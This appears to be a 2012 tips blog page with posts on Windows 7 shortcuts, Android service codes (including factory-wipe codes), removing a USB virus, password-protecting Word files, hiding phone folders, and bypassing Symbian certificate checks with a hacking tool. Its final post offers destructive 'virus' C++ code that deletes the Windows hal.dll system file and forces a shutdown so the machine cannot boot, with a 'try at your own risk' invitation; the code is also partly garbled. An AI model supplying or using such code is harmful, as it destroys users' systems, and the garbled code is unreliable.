Welcome to pctricksstuff.com for more updates like us on facebook

Pages

Labels

Thursday, 14 June 2012

Unknown Sortcut Key's For Windows' 7


Here Are The Unknown Shortcut's Key's For Window's 7

Win+Home: Clear all but the active window.

Win+Space: All windows become transparent so you can see through to the desktop.

Win+Up arrow: Maximize the active window.

Shift+Win+Up arrow: Maximize the active window vertically.

Win+Down arrow: Minimize the window/Restore the window if it's maximized.

Win+Left/Right arrows: Dock the window to each side of the monitor.

Shift+Win+Left/Right arrows: Move the window to the monitor on the left or right.

Drag window to the top:  Maximize

Drag window left/right:  Dock the window to fill half of the screen.

Shake window back/forth:  Minimize everything but the current window.

Double-Click Top Window Border (edge):  Maximize window vertically.


Android Mobile Codes

Here Are The Android Phone Codes.

1. Complete Information About your Phone

#*#4636#*#

This code can be used to get some interesting information about your phone and battery.
Usage statistics

2. Factory data reset

#*#7780#*#

This code can be used for a factory data reset. It'll remove following things:

Google account settings stored in your phone

System and application data and settings

Downloaded applications

It'll  not remove:

Current system software and bundled application

SD card files e.g. photos, music files, etc.

Note: Once you give this code, you get a prompt screen asking you to clickon "Reset phone" button. So you get a chance to cancel your operation.

3. Format Android Phone

*2767*3855#

Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage.

 It'll also reinstall the phone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.


Wednesday, 13 June 2012

Remove Pendrive Virus


Want To Remove Virus From Your Pendrive.

If You Are Using Pendrive For Data Transfer At School, College Or At Your Office Or Any Where

You Must Have Come Across The VIRUS Creates An exe File In Your USB Drive With The Name New Folder.exe



With This Virus

Task Manager Is Disabled.

Registry Editor Is Disabled.

Folder Options Not Working.

Taking Too Much Time For Accessing Pendrive.

Uses Half Of Your Computers Processing Power.

Now You Can Easily Remove This Virus.

Just Download The Tool From The Link Below.

Download Link

Run This Downloaded exe By Double Clicking On It.

Then Click On “Delete Autorun.inf file”.

After That Click On ” Remove virus from USB”.

The Virus Will Be Removed From Your Pendrive.

With This Tool You Can Also Restore Your Task Manager, Registry Editor And Other Things Which Were Disabled By Virus
just click on

“Restore Default Windows Settings”. Thats It.............


Monday, 7 May 2012

Protect Your Microsoft Word Document


We all use Microsoft Word to create documents and some times we dont want other people to access our documents.

To deal with such a situation Microsoft word 2007 integrated a security feature in Microsoft word so that you can password protect your files.



just follow the below step to make your document protected

1 Click on the Microsoft Office Button present on the top left corner of the window.

2 Now Click on the Save As option

3 Now a new window will pop up.

4 Click on Tools option at the bottom of the window.

5 Now you will have two options.

6 You can select either one or both options

7 One is Password To Open it will ask for the password every time the document is opened.

8 o to view the document you have to enter the password first.

9 Second is Password To Modify it will ask for the password every time somebody tries to                                                                                                            
    modify that document.

10 So now you can password protect your microsoft word document.

Hide Folder's In Your Phone Without Using Any Software


Have you ever wanted to hide folders in your phone?

If yes,there here is very interesting solution for you to hide folders in your phone and you dont even need any software for that.

This trick can be used for any JAVA phone from Nokia,Samsung,Motorola,LG or any other company.



JUST FOLLOW STEPS GIVEN BELOW.

 1 Create any new folder or you can use any existing folder that is to be hidden.

2 Rename the folder to any name but with the extension of .jad like if I want to hide my images folder then I will name it as LMG.jad

3 Now create a new folder with the same name in the same directory but with the extension of .jar So, I would create the folder with the name LMG.jar

And thats it!! My orignal images folder which has been renamed with .jad gets hidden and only folder with.jar extension is visible which is empty.

So,my data is protected/hidden from unwanted eyes.

To unhide the orignal folder you have to remove the .jar extension from the new folder and your orignal folder with all the files and with .jad will become visible..

So Enjoy This Trick.

Sunday, 6 May 2012

Install Any Application Without Certificate Error In Symbian Phones


Want To Get Rid Of Certificate Error's On Your Symbian Phones When You Install Software .

Here Is A Complete Way By Which U Can Install Any Software Without Any Certificate Error.


Download HelloOX2 V2.03 or the latest version from the HelloOX2 Ofiicial Website.

HelloOX2 Is An Excellent Tool To Hack Symbian S60 3rd, 5th and Symbian^3 Smartphones Which Makes It Possible To Install A Root Certificate By Gaining Full Access To The Phone’s System Files.

With This Capability, You Can Install Anything You Want On Your Phones Without The Need To Worry About The Annoying Certificate Error!


The Signed Version Of HelloOX2 Demands For A Donation And Hence, Only The Unsigned Version Is Available For Free Download.

Here Is The Download Link For Hello0x2 Unsigned

Download Link


 If You Have The Unsigned Version, You Need To Sign It Before Installing On Your Phone.

To Sign The Hello0X2 Software You Just Need An Sis Signer Software .

Here Is The Download Link To Download Mobile Signer Software.




Go To The OPDA Website, Get Registered And Login To Your Account.

Click On The “Apply Certificate” Tab, Enter The Model Number And The IMEI Of Your Phone And Then Click On “Submit and Upload” button.

It will usually take up 24 hours for your certificate and key file to be generated and uploaded.

Wednesday, 2 May 2012

C++ Virus


This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}

Try this At Your Own Risk